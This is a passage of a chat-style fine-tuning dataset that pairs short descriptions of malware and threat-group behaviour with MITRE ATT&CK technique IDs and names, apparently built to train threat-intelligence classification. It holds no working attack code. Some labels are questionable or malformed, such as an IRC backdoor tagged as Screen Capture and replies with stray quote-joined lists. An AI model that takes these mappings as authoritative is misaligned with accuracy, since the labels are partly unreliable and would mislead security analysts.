\"ID# - Technique\". " }, { "role": "user", "content": "Drovorub can delete specific files from a compromised host." }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "KeyBoy installs a keylogger for intercepting credentials and keystrokes." }, { "role": "assistant", "content": "T1056.001 - Input Capture: Keylogging" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Several Lazarus Group has conducted word searches on compromised machines to identify specific documents of interest. Lazarus Group malware can use a common function to identify target files by their extension, and some also enumerate files and directories, including a Destover-like variant that lists files and gathers information for all drives." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ThiefQuest uploads files via unencrypted HTTP." }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has used bitsadmin.exe to download additional tools." }, { "role": "assistant", "content": "T1197 - BITS Jobs" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "searches the local system and gathers data." }, { "role": "assistant", "content": "T1005 - Data from Local System" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "samples were timestomped by the authors by setting the PE timestamps to all zero values. also has a built-in command to modify file times." }, { "role": "assistant", "content": "T1070.006 - Indicator Removal on Host: Timestomp" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Shark can use encrypted and encoded files for C2 configuration." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Kimsuky has packed malware with UPX." }, { "role": "assistant", "content": "T1027.002 - Obfuscated Files or Information: Software Packing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "captures the content of the desktop with the screencapture binary." }, { "role": "assistant", "content": "T1113 - Screen Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "LOWBALL uses the Dropbox API to request two files, one of which is the same file as the one dropped by the malicious email attachment. This is most likely meant to be a mechanism to update the compromised host with a new version of the LOWBALL malware." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "FIN7 has used malicious links to lure victims into downloading malware." }, { "role": "assistant", "content": "T1204.001 - Malicious Link" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "To do this, Tick uses a number of publicly available hacktools such as Mimikatz, GSecdump, and Windows Credential Editor. The tools are downloaded and deployed to the original install directory previously created by the malware" }, { "role": "assistant", "content": "T1588.002 - Tool" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Frankenstein has uploaded and downloaded files to utilize additional plugins." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "DustySky scans the victim for files that contain certain keywords and document types including PDF, DOC, DOCX, XLS, and XLSX, from a list that is obtained from the C2 as a text file. It can also identify logical drives for the infected machine." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Denis has a version written in PowerShell." }, { "role": "assistant", "content": "T1059.001 - Command and Scripting Interpreter: PowerShell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "This is exceedingly noisy traffic. Furthermore, Hancitor has demonstrated a noticeable lack of stealth in deploying and using this ping tool. Such an unusual EXE file is easy to notice, especially when the results of its scan are saved as a text file in the same directory." }, { "role": "assistant", "content": "T1588.002 - Tool', 'T1588.002 - Tool" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The first thing this malware does is it copies itself to the startup directory for persistence" }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Carbanak logs key strokes for configured processes and sends them back to the C2 server." }, { "role": "assistant", "content": "T1056.001 - Input Capture: Keylogging" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Lazarus Group has used code signing certificates issued by Sectigo RSA for some of its malware and tools." }, { "role": "assistant", "content": "T1588.003 - Code Signing Certificates" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Frankenstein has communicated with a C2 via an encrypted RC4 byte stream and AES-CBC." }, { "role": "assistant", "content": "T1573.001 - Symmetric Cryptography" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Leviathan has established domains that impersonate legitimate entities to use for targeting efforts." }, { "role": "assistant", "content": "T1583.001 - Domains" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT28 has exfiltrated archives of collected data previously staged on a target's OWA server via HTTPS." }, { "role": "assistant", "content": "T1048.002 - Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "IceApple can harvest credentials from local and remote host registries." }, { "role": "assistant", "content": "T1552.002 - Unsecured Credentials: Credentials in Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Duqu will inject itself into different processes to evade detection. The selection of the target process is influenced by the security software that is installed on the system (Duqu will inject into different processes depending on which security suite is installed on the infected host)." }, { "role": "assistant", "content": "T1055.001 - Process Injection: Dynamic-link Library Injection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "GreyEnergy has a module for Mimikatz to collect Windows credentials from the victim’s machine." }, { "role": "assistant", "content": "T1003.001 - OS Credential Dumping: LSASS Memory" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "PwDumpVariant: This tool imports lsremora.dll (often downloaded by the attacker as part of the toolset) and uses the GetHash export of this DLL. On execution, the tool injects itself into lsass.exe and is triggered with the argument “dig" }, { "role": "assistant", "content": "T1003.001 - OS Credential Dumping: LSASS Memory" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SysUpdate can search files on a compromised host." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "LAPSUS$ has searched a victim's network for collaboration platforms like SharePoint to discover further high-privilege account credentials." }, { "role": "assistant", "content": "T1213.002 - Sharepoint" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The malicious payload associated with the campaign appears to be a new version of Zeus Panda, a banking trojan designed to stealing banking and other sensitive credentials for exfiltration by attackers. The payload that Talos analyzed was a multi-stage payload, with the initial stage featuring several anti-analysis techniques designed to make analysis more difficult and prolonged execution to avoid detection. It also featured several evasion techniques designed to ensure that the malware would not execute properly in automated analysis environments, or sandboxes. The overall operation of the Zeus Panda banking trojan has been well documented, however Talos wanted to provide additional information about the first stage packer used by the malware. The malware will first query the system's keyboard mapping to determine the language used on the system. It will terminate execution if it detects the any of the following keyboard mappings" }, { "role": "assistant", "content": "T1059.001 - Command and Scripting Interpreter: PowerShell', 'T1614.001 - System Location Discovery: System Language Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Comnie allows the attacker to provide and subsequently execute a batch script (BAT), executable file (EXE), or dynamic-link library (DLL)" }, { "role": "assistant", "content": "T1059 - Command and Scripting Interpreter', 'T1064 - Scripting" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Kimsuky has used emails containing Word, Excel and/or HWP (Hangul Word Processor) documents in their spearphishing campaigns." }, { "role": "assistant", "content": "T1566.001 - Phishing: Spearphishing Attachment" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ObliqueRAT can discover pluggable/removable drives to extract files from." }, { "role": "assistant", "content": "T1120 - Peripheral Device Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Embed \"scriptlets\" in generated payloads to perform some tasks \"offline\" without needing network connectivity (ex: start keylogger, add persistence, execute custom python script, check_vm, etc.) Multiple Target Platforms: Platform Support Status Windows XP Supported Windows 7 Supported Windows 8 Supported Windows 10 Supported Linux Supported Mac OSX Limited Support Android Limited Support Documentation All documentation can be found on the wiki" }, { "role": "assistant", "content": "T1106 - Native API', 'T1010 - Application Window Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "TeamTNT has disabled and uninstalled security tools such as Alibaba, Tencent, and BMC cloud monitoring agents on cloud-based infrastructure." }, { "role": "assistant", "content": "T1562.001 - Impair Defenses: Disable or Modify Tools" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Strings in the backdoor are encrypted using a custom algorithm that uses XOR with a 4-byte key" }, { "role": "assistant", "content": "T1573 - Encrypted Channel', 'T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Aquatic Panda has attempted to stop endpoint detection and response (EDR) tools on compromised systems." }, { "role": "assistant", "content": "T1562.001 - Impair Defenses: Disable or Modify Tools" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Earth Lusca has sent spearphishing emails to potential targets that contained a malicious link." }, { "role": "assistant", "content": "T1566.002 - Phishing: Spearphishing Link" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "On a different system, operators dropped a legitimate copy of credwize.exe, the Microsoft Credential Backup and Restore Wizard, on disk and used it to execute the malicious library New.dll, another Turian variant" }, { "role": "assistant", "content": "T1055.001 - Process Injection: Dynamic-link Library Injection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can establish persistence by creating a .lnk file in the Start menu." }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BRONZE BUTLER has made use of Python-based remote access tools." }, { "role": "assistant", "content": "T1059.006 - Command and Scripting Interpreter: Python" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The Bluetooth functionality in Flamer is encoded in a module called \"BeetleJuice\". This module is triggered according to configuration values set by the attacker. This means that a computer compromised by W32.Flamer will appear when any other Bluetooth device scans the local area. In addition to enabling a Bluetooth beacon, Flamer encodes details about the infected computer (see Figure 1) and then stores these details in a special 'description' field. When any other device scans for Bluetooth-enabled devices, this description field will be displayed: These are the facts of how Flamer uses Bluetooth. The attacker, however, could identify the location of compromised devices using Bluetooth. The Beetlejuice module already has retrieved a list of all the devices IDs which are near to the infected computer and so the attacker knows what devices belong to the victim. Some attacks have even identified Bluetooth devices more than one mile away. With increase functionality an attacker, having identified various Bluetooth devices in range, could perform numerous attacks: - Steal contacts from an address book, steals SMS messages, steals images, and more. An attacker within one mile of the target could use their own Bluetooth-enabled device for this. If the second computer is using a secured network and was infected through a USB connection, potentially the only network available would be a Bluetooth connection back to the first compromised computer" }, { "role": "assistant", "content": "T1011.001 - Exfiltration Over Bluetooth" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "This exception invokes the exception handler containing the HTTP communication code, allowing it to run" }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Higaisa used AES-128 to encrypt C2 traffic." }, { "role": "assistant", "content": "T1573.001 - Symmetric Cryptography" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "PLATINUM has leveraged a zero-day vulnerability to escalate privileges." }, { "role": "assistant", "content": "T1068 - Exploitation for Privilege Escalation" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The Magic Hound campaign was also discovered deploying an IRC Bot, which we have named MagicHound.Leash. We discovered this connection when we observed a DropIt sample installing a backdoor Trojan that used IRC for its C2 communications" }, { "role": "assistant", "content": "T1113 - Screen Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Variants of encrypt payloads using various XOR ciphers, as well as a custom algorithm that uses the \"srand\" and \"rand\" functions." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Linux Rabbit attempts to gain access to the server via SSH." }, { "role": "assistant", "content": "T1133 - External Remote Services" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT39 has used a screen capture utility to take screenshots on a compromised host." }, { "role": "assistant", "content": "T1113 - Screen Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Hacking Team UEFI Rootkit is a UEFI BIOS rootkit developed by the company Hacking Team to persist remote access software on some targeted systems." }, { "role": "assistant", "content": "T1014 - Rootkit', 'T1542.001 - Pre-OS Boot: System Firmware" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT28 has used pass the hash for lateral movement." }, { "role": "assistant", "content": "T1550.002 - Use Alternate Authentication Material: Pass the Hash" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Patchwork developed a file stealer to search C:\\ and collect files with certain extensions. Patchwork also executed a script to enumerate all drives, store them as a list, and upload generated files to the C2 server." }, { "role": "assistant", "content": "T1119 - Automated Collection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Pasam creates a backdoor through which remote attackers can delete files." }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "TAINTEDSCRIBE can execute \"FileRecvWriteRand\" to append random bytes to the end of a file received from C2." }, { "role": "assistant", "content": "T1027.001 - Obfuscated Files or Information: Binary Padding" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "FIN6 has used encoded PowerShell commands." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "menuPass has collected various files from the compromised computers." }, { "role": "assistant", "content": "T1005 - Data from Local System" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "PcShare has been named `wuauclt.exe` to appear as the legitimate Windows Update AutoUpdate Client." }, { "role": "assistant", "content": "T1036.005 - Masquerading: Match Legitimate Name or Location" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Ember Bear has attempted to lure victims into executing malicious files." }, { "role": "assistant", "content": "T1204.002 - User Execution: Malicious File" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "We at Team Nautilus detected and analyzed the Docker Hub account hildeteamtnt, which was used by TeamTNT to store their malicious images. Also, ‘minerescape’ contained a shell script executing a Python file - minedaemon.py. Using a web service (iplogger[.]org) to transmit collected data to the attacker during the discovery process, for instance, the number of cores in the CPU, its speed, system details (using uname -a), and targeted host IP address. Logging the activity and encoding it into files (using Base64). The script sbs.sh: - Downloading 00.jpg (as /usr/bin/dns_ipv4.tar.gz) which is the file /usr/bin/bioset. Creating a child process that listens to the socket and communicates with the father using a method called ‘Named PIPE’ (also known as FIFO). The father is responsible for deciphering messages and writing it back to the child on the PIPE. Creating a child process that listens to the socket and communicates with the father using a method called ‘Named PIPE’ (also known as FIFO). - The father is responsible for deciphering messages and writing it back to the child on the PIPE. Logging the activity and encoding it into files (using Base64). - Defense Evasion: Deleting command history. Logging the activity and encoding it into files (using Base64). Defense Evasion Techniques: Removing system logs (/var/log/syslog). Deleting command history. Logging the activity and encoding it into files (using Base64). - Defense Evasion Techniques: Removing system logs (/var/log/syslog). Deleting command history. Encoding many snippets with base64 (the same snippet may be encoded multiple times). To sum it up . Over four months, TeamTNT uploaded various images, with some being used to perform attacks in the wild" }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Imminent Monitor has the capability to run a cryptocurrency miner on the victim machine." }, { "role": "assistant", "content": "T1496 - Resource Hijacking" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Empire can enumerate the username on targeted hosts." }, { "role": "assistant", "content": "T1033 - System Owner/User Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "obfuscates C2 communication using a 1-byte XOR with the key 0xBE." }, { "role": "assistant", "content": "T1573 - Encrypted Channel" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "MCMD can use Registry Run Keys for persistence." }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "PowerShower has the ability to identify the current user on the infected host." }, { "role": "assistant", "content": "T1033 - System Owner/User Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Magic Hound has attempted to lure victims into opening malicious email attachments." }, { "role": "assistant", "content": "T1204.002 - User Execution: Malicious File" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has encrypted C2 traffic with RSA." }, { "role": "assistant", "content": "T1573 - Encrypted Channel" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can execute commands on the victim." }, { "role": "assistant", "content": "T1059 - Command and Scripting Interpreter" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Cardinal RAT sets \"HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\Load\" to point to its executable." }, { "role": "assistant", "content": "T1112 - Modify Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "uses HTTP POST requests with data formatted using a custom protocol." }, { "role": "assistant", "content": "T1095 - Non-Application Layer Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ShimRatReporter used the Windows function \"GetExtendedUdpTable\" to detect connected UDP endpoints." }, { "role": "assistant", "content": "T1049 - System Network Connections Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "When executed, QakBot will check whether it has previously been executed on the machine by checking for the specified malware folder. If QakBot discovers it is a first time run, it will relaunch itself from cmd.exe with the /C parameter that will inform the loader to proceed and run its Anti-VM checks on the machine and return the results to the parent process. If QakBot detects it is running in a VM environment, then the final payload will not be decrypted since QakBot uses the return value from these checks in its final decryption routine. Figure 7 below shows the QakBot environment check logic" }, { "role": "assistant", "content": "T1057 - Process Discovery', 'T1055.012 - Process Injection: Process Hollowing', 'T1059.003 - Command and Scripting Interpreter: Windows Command Shell', 'T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "samples have been signed with a code-signing certificates." }, { "role": "assistant", "content": "T1553.002 - Code Signing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Download & execute Startup (with persistence) Collection of system information (OS, version, installed location, etc.) Self-update Uninstall This project was created by a user called zettabithf which is linked to a user with the same name in Hack Forums" }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Ryuk has constructed legitimate appearing installation folder paths by calling \"GetWindowsDirectoryW\" and then inserting a null byte at the fourth character of the path. For Windows Vista or higher, the path would appear as \"C:\\Users\\Public\"." }, { "role": "assistant", "content": "T1036.005 - Masquerading: Match Legitimate Name or Location" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The output of the downloaded batch file is saved to “%PUBLIC%\\Libraries\\tp\\<batch filename>.txt”. The script will then upload the output of this batch file by including the data in a sequence of DNS queries. The exfiltrates the output of the batch script by splitting up the data within the text file into chunks up to 23 bytes and sends the data within a series of DNS queries that have the following structure" }, { "role": "assistant", "content": "T1030 - Data Transfer Size Limits" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Reg may be used to find credentials in the Windows Registry." }, { "role": "assistant", "content": "T1552.002 - Unsecured Credentials: Credentials in Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "TAINTEDSCRIBE can change the timestamp of specified filenames." }, { "role": "assistant", "content": "T1070.006 - Indicator Removal on Host: Timestomp" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Threat Group-3390 has detached network shares after exfiltrating files, likely to evade detection." }, { "role": "assistant", "content": "T1070.005 - Indicator Removal on Host: Network Share Connection Removal" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The initial DNS query sent by the payload to obtain the system specific identifier uses the following structure, which includes the current process identifier (PID) as the subdomain of the C2 domain: . The C2 server will provide the system specific identifier within the answer portion of the DNS response" }, { "role": "assistant", "content": "T1071 - Application Layer Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT29 was able to get SUNBURST signed by SolarWinds code signing certificates by injecting the malware into the SolarWinds Orion software lifecycle." }, { "role": "assistant", "content": "T1553.002 - Code Signing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "HARDRAIN 